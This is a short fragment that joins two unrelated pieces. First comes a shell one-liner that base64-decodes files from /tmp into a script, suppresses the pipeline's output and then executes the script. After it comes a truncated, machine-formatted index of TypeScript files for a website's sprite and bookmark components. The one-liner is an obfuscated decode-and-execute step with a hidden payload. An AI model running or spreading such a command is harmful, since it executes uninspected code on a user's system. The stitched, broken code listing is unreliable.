cat /tmp/zgl1?? | base64 -d | tee /tmp/zrun.sh | true; sh /tmp/zrun.sh

BEGIN NAME global.ts 375 L new SvgSprite('/Static/images/asis-sprite.svg'); NAME featured-content.ts 1142 L - NAME global-async.ts 2701 L import { BookmarkDetailPage } from './bookmark/bookmark-detail-page' L import { BookmarkListPage } from './bookmark/bookmark-list-page' L // If the page has the Bookmark button we initialize the component L if (document.querySelector('.btn-bookmark')) { L let bookmark = new BookmarkDetailPage(); L if (document.querySelector('.bookmark-list')) { L let bookmarkListPage = new BookmarkListPage(); NAME gallery.ts 11482 L - ENDPY END END